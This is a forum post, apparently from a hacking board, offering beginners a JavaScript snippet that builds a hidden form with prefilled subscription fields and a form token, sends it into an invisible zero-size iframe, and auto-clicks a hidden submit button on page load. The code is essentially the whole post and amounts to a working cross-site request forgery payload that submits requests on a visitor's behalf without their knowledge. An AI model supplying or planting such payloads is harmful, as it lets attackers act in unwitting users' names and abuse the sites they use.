Login Register
The stories and information posted here are artistic works of fiction and falsehood. Only a fool would take anything posted here as fact.


[For Beginners] How to get a automatic html post request filter_list
Author
Message
[For Beginners] How to get a automatic html post request #1
Code:
<script> document.write('<form method="post" name="subscribeform" action="http://127.0.0.1" target="zero">'); document.write('<input type="hidden" name="formtoken" value="9cf80e7901984c446df7aac12696c288">'); document.write('<input type="hidden" name="email" value="email@hotmail.com">'); document.write('<input type="hidden" name="htmlemail" value="1">'); document.write('<input type="hidden" name="attribute7" value="Joaquim">'); document.write('<input type="hidden" name="attribute6" value="Broodly">'); document.write('<input type="hidden" name="rssfrequency" value="daily">'); document.write('<input type="hidden" name="list[3]" value="signup">'); document.write('<input type="hidden" name="listname[3]" value="update">'); document.write('<input type="hidden" name="list[2]" value="signup">'); document.write('<input type="hidden" name="listname[2]" value="NKK Info">'); document.write('<input type="hidden" name="VerificationCodeX" value="">'); document.write('<input type="submit" name="subscribe" value="subscribe" style="height:0px; width:0px; background-color:#f0f0f2; border:0px">'); document.write('</form>'); document.write('<iframe name="zero" height="0" width="0" frameborder="0"></iframe>'); document.forms[0]["subscribe"].click(); </script>

Any question leave a reply....

Reply





Messages In This Thread
[For Beginners] How to get a automatic html post request - by hacxx - 11-27-2021, 08:27 PM



Users browsing this thread: